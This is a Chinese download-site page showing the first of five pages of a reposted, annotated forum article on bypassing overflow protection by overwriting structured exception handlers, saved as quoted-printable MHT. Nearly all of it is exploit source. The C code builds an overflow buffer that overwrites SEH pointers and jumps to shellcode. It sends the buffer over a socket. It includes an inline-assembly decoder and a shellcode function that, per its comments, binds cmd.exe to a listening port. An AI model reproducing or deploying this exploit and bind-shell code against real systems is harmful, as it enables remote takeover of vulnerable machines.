⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站
📤 上传资源

📄 [转帖+注释]利用结构异常绕过溢出保护攻击.mht

📁 精华BBS贴子
💻 MHT
📖 第 1 页 / 共 5 页
字号:
🔍
12345 
                           =
&nbsp;temp=3Dshellcodebuff<I>;<BR>&nbsp;=20
                        &nbsp;&nbsp;=20
                        =
&nbsp;if(temp&lt;=3D0x10||temp=3D=3D'0'){<BR>/*&nbsp; &nbsp;=20
                        =
=B6=D4shellcodefn=BA=AF=CA=FD=D7=D6=B7=FB=B1=E0=C2=EB=A3=AC=B8=B4=D6=C6=B5=
=BDbuf=D6=D0&nbsp; &nbsp;<BR>&nbsp;=20
                        =
&nbsp;buf=BD=E1=B9=B9=BD=AB=B1=E4=CE=AA<BR>[NNNNNNNN][NNNN][shellcodefnlo=
ck][port][str][shellcodefn][NNNN]<BR>&nbsp;=20
                        &nbsp; 32=B8=F6&nbsp; &nbsp; =
4=B8=F6<BR>&nbsp;&nbsp;<BR>&nbsp;=20
                        &nbsp; <BR>&nbsp; &nbsp; */<BR><BR>&nbsp; &nbsp; =

                        buff[OVERADD+NOPLONG+k]=3D'0';<BR>&nbsp; &nbsp;=20
                        ++k;<BR>&nbsp; &nbsp; temp+=3D0x40;<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;}<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;buff[OVERADD+NOPLONG+k]=3Dtemp;<BR>&nbsp;=20
                        &nbsp;&nbsp;=20
                        =
&nbsp;++k;<BR>}<BR><BR>&nbsp;&nbsp;<BR>for(i=3D-0x30;i&lt;0x20;i+=3D8){<B=
R>&nbsp;=20
                        &nbsp;=20
                        =
memcpy(buff+OVERADD2+i,JMPNEXTJMP,4);<BR>/*<BR>&nbsp;&nbsp;=B8=B2=B8=C7=D2=
=EC=B3=A3=BD=E1=B9=B9=B5=C4=CF=C2=D2=BB=B8=F6=D2=EC=B3=A3=C1=B4next=CA=FD=
=BE=DD=A3=AC=B7=A2=C9=FA=D2=EC=B3=A3=CA=B1ebx=D6=C6=CF=F2=D5=E2<BR>&nbsp;=
&nbsp;=D3=EB=CD=A8=B3=A3=B5=C4=B7=A2=C9=FA=D2=E7=B3=F6=CA=B1ESP=D6=B8=CF=F2=
=D2=E7=B3=F6=B4=FA=C2=EB=B8=BD=BD=FC=B2=BB=D2=BB=D1=F9=A3=AC=B7=A2=C9=FA=D2=
=EC=B3=A3=CA=B1<BR>&nbsp;&nbsp;=B5=C4ESP=B2=BB=D4=DA=D5=E2=B8=BD=BD=FC<BR=
>*/&nbsp;=20
                        =
&nbsp;<BR>&nbsp;&nbsp;memcpy(buff+OVERADD2+i+4,eipwinnt,4);<BR>/*=20
                        =
<BR>=B8=B2=B8=C7=D2=EC=B3=A3=BD=E1=B9=B9=B5=C4=B3=CC=D0=F2=D6=B8=D5=EB<BR=
>=B7=A2=C9=FA=D2=EC=B3=A3=CA=B1=BB=E1=D7=AA=B5=BD=D5=E2=D6=B8=D5=EB=C8=A5=
=D4=CB=D0=D0<BR>=D5=E2=B8=B2=B8=C7=B5=C4=CA=C7=D2=BB=B8=F6jmp=20
                        =
ebx=D6=B8=C1=EE=B5=C4=B5=D8=D6=B7<BR>*/<BR>}<BR>/*<BR>&nbsp;&nbsp;=C1=AC=D0=
=F8=B8=B2=B8=C7=A3=AC=D4=F6=B4=F3=B8=B2=B8=C7=B5=F4=D2=EC=B3=A3=BD=E1=B9=B9=
=B5=C4=BF=C9=C4=DC=D0=D4=20
                        =
<BR>*/<BR>memcpy(buff+OVERADD2+8,JMPSHELL,5);<BR>/*<BR>&nbsp;&nbsp;=CC=F8=
=B5=BDshellcode=C8=A5=B5=C4=CC=F8=D7=AA=B4=FA=C2=EB=A3=AC=D4=B6=CC=F8=D7=AA=
=A1=A3<BR>*/<BR>&nbsp;&nbsp;sendpacketlong=3D0x1000-0x10;<BR><BR>/*&nbsp;=
&nbsp;=D7=EE=D6=D5=B5=C4buf=CE=AA=A3=BA&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;esp =

                        ret<BR>&nbsp;=20
                        =
&nbsp;<BR>[NNNNNNNN][NNNN][shellcodefnlock][port][str][shellcodefn][NNNNN=
NNNNNN][\x90\x90\x90\x2d\x63\x0d\xfa\x7f][\xe9\x40\xf0\xff\xff]<BR>&nbsp;=
=20
                        &nbsp; 32=B8=F6&nbsp; &nbsp; 4=B8=F6&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp; 0xf88h^&nbsp; =
&nbsp;=20
                        =
10=B8=F6<BR><BR>*/<BR>&nbsp;&nbsp;for(i=3D0;i&lt;1;++i){=20
                        <BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;j=3Dsendpacketlong;<BR>&nbsp;=20
                        &nbsp;&nbsp; =
&nbsp;&nbsp;&nbsp;fprintf(stderr,"\n=20
                        send&nbsp;&nbsp;packet %d bytes.",j);<BR>&nbsp;=20
                        &nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;send(fd,buff,j,0);<BR>&nbsp;=20
                        &nbsp;&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;k=3Drecv(fd,recvbuff,0x1000,0);<BR>&nbsp;=20
                        &nbsp;&nbsp; =
&nbsp;&nbsp;&nbsp;if(k&gt;0){<BR>&nbsp;=20
                        &nbsp; recvbuff[k]=3D0;<BR>&nbsp; &nbsp;=20
                        fprintf(stderr,"\n&nbsp;&nbsp;recv:\n=20
                        %s",recvbuff);<BR>&nbsp; &nbsp;&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;}<BR>&nbsp;&nbsp;}<BR>&nbsp;&nbsp;closesocket(fd);<BR>&=
nbsp;&nbsp;WSACleanup(=20
                        =
);<BR>&nbsp;&nbsp;return(0);<BR>}<BR>&nbsp;&nbsp;<BR><BR>void&nbsp;&nbsp;=
shellcodefnlock()<BR>{<BR>&nbsp;=20
                        &nbsp; _asm<BR>{<BR>&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;nop<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;nop<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;nop<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;nop<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;nop<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;nop<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;nop<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;nop<BR>/*=20
                        =
=D3=C3=D3=DA=B6=A8=CE=BB=CF=C2=C3=E6=D2=BB=D0=A1=B6=CE=BB=E3=B1=E0=D6=B8=C1=
=EE=B5=C4NOP =B4=AE */<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;jmp&nbsp;=20
                        &nbsp;next<BR>getediadd: <BR>&nbsp;=20
                        &nbsp;&nbsp;&nbsp;pop&nbsp; &nbsp;EDI<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;push&nbsp;&nbsp;EDI<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;&nbsp;pop&nbsp;=20
                        &nbsp;ESI<BR>&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;xor&nbsp; =
&nbsp;ecx,ecx<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;&nbsp;mov&nbsp;=20
                        &nbsp;cx,0x0fd0<BR>looplock:<BR>&nbsp;=20
                        &nbsp;&nbsp;&nbsp;lodsb<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;cmp&nbsp;=20
                        &nbsp;al,0x30<BR>&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;jnz&nbsp; &nbsp;sto<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;lodsb<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;sub&nbsp;=20
                        &nbsp;al,0x40<BR>sto:&nbsp; &nbsp;&nbsp; &nbsp;=20
                        <BR>&nbsp; &nbsp;&nbsp;&nbsp;stosb<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;loop&nbsp;&nbsp;looplock<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;&nbsp;jmp&nbsp;=20
                        &nbsp;shell<BR>next:&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;=20
                        =
call&nbsp;&nbsp;getediadd<BR>/*&nbsp;&nbsp;=BD=E2=C2=EBshellcode=20
                        */<BR>shell:&nbsp; &nbsp;&nbsp; =
&nbsp;NOP<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;NOP<BR>&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;NOP<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;NOP<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;NOP<BR>&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;NOP<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;NOP<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;NOP<BR><BR>}<BR>}<BR><BR>/* =
=D5=E6=D5=FD=CA=B5=CF=D6=B9=A6=C4=DC=B5=C4shellcode=20
                        */<BR>/* =
=B1=BEshellcode=CA=B5=CF=D6=BF=AA=B6=CB=BF=DA=B0=F3=B6=A8cmd.exe =
=B5=C4=B9=A6=C4=DC */<BR>void=20
                        shellcodefn()<BR>{ char&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;Buff[0x800];<BR>int&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; =
&nbsp;*except[3];<BR><BR>FARPROC&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;closesocketadd;<BR>FARPROC&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;ioctlsocketadd;<BR>FARPROC&nbsp;=20
                        &nbsp;&nbsp;&nbsp;recvadd;<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;FARPROC&nbsp;=20
                        &nbsp;&nbsp;&nbsp;sendadd;<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;FARPROC&nbsp;=20
                        &nbsp;&nbsp;&nbsp;acceptadd;<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;FARPROC&nbsp;=20
                        &nbsp;&nbsp;&nbsp;listenadd;<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;FARPROC&nbsp;=20
                        &nbsp;&nbsp;&nbsp;bindadd;<BR>&nbsp; =
&nbsp;FARPROC&nbsp;=20
                        &nbsp;&nbsp;&nbsp;socketadd;<BR>/*&nbsp;=20
                        &nbsp;&nbsp;&nbsp;FARPROC&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;WSAStartupadd;&nbsp;&nbsp;*/<BR><BR>FARPROC&nbsp;=20
                        &nbsp;&nbsp;&nbsp;NOPNOP;<BR><BR>FARPROC&nbsp;=20
                        &nbsp;&nbsp;&nbsp;WriteFileadd;<BR>FARPROC&nbsp; =

                        &nbsp;&nbsp;&nbsp;ReadFileadd;<BR>FARPROC&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;PeekNamedPipeadd;<BR>FARPROC&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;CloseHandleadd;<BR>FARPROC&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;CreateProcessadd;<BR>FARPROC&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;CreatePipeadd;<BR>FARPROC&nbsp;&nbsp;procloadlib;<BR><B=
R>FARPROC&nbsp;=20
                        &nbsp;&nbsp;&nbsp;apifnadd[1];<BR>FARPROC&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;procgetadd=3D0;<BR><BR>char&nbsp;=20
                        &nbsp;&nbsp; =
&nbsp;&nbsp;&nbsp;*stradd;<BR>int&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;imgbase,fnbase,k,l;<BR>HANDLE&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;libhandle;<BR>&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;STARTUPINFO siinfo;<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;&nbsp;SOCKET&nbsp;=20
                        &nbsp;&nbsp; &nbsp;listenFD,clientFD;<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;&nbsp;struct&nbsp;=20
                        &nbsp;&nbsp; &nbsp;sockaddr_in server;<BR>&nbsp; =

                        &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;&nbsp;int&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;iAddrSize =3D=20
                        sizeof(server);<BR>int&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;lBytesRead;<BR>u_short&nbsp;=20
                        &nbsp;&nbsp;&nbsp;shellcodeport;<BR><BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;PROCESS_INFORMATION=20
                        ProcessInformation;<BR>&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;HANDLE&nbsp; &nbsp;&nbsp;=20
                        =
&nbsp;hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;SECURITY_ATTRIBUTES =
sa;<BR>_asm=20
                        {&nbsp; &nbsp;&nbsp;&nbsp;jmp&nbsp; &nbsp;=20
                        nextcall<BR>&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;getstradd:&nbsp; &nbsp;pop&nbsp; &nbsp;=20
                        stradd<BR>&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp; =
lea&nbsp;=20
                        &nbsp; EDI,except<BR>&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;&nbsp;mov&nbsp;=20
                        &nbsp; eax,dword ptr =
FS:[0]<BR>&nbsp;&nbsp;mov&nbsp;=20
                        &nbsp; dword ptr =
[edi+0x08],eax<BR>&nbsp;&nbsp;mov&nbsp;=20
                        &nbsp; dword ptr FS:[0],EDI<BR><BR>}<BR>&nbsp; =
&nbsp;=20
                        except[0]=3D0xffffffff;<BR>&nbsp; &nbsp;=20
                        except[1]=3Dstradd-0x07;<BR><BR>&nbsp; &nbsp;=20
                        imgbase=3D0x77e00000;<BR>&nbsp; &nbsp; =
_asm{<BR>&nbsp;=20
                        &nbsp; call getexceptretadd<BR>&nbsp; &nbsp;=20
                        =
}<BR>for(;imgbase&lt;0xbffa0000,procgetadd=3D=3D0<IMG=20
                        =
src=3D"http://25.20.176.12/bbs/images/smilies/wink.gif"=20
                        align=3DabsMiddle border=3D0>{<BR>&nbsp;=20
                        &nbsp;&nbsp;&nbsp;imgbase+=3D0x10000;<BR>&nbsp;=20
                        &nbsp;&nbsp;&nbsp;if(imgbase=3D=3D0x78000000)=20
                        imgbase=3D0xbff00000;<BR>&nbsp; =
&nbsp;&nbsp;&nbsp;if(*(=20
                        WORD *)imgbase=3D=3D'ZM'&amp;&amp; *(WORD=20
                        =
*)(imgbase+*(int<BR>*)(imgbase+0x3c))=3D=3D'EP'){<BR>fnbase=3D*(int=20
                        *)(imgbase+*(int=20
                        *)(imgbase+0x3c)+0x78)+imgbase;<BR>k=3D*(int=20
12345

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -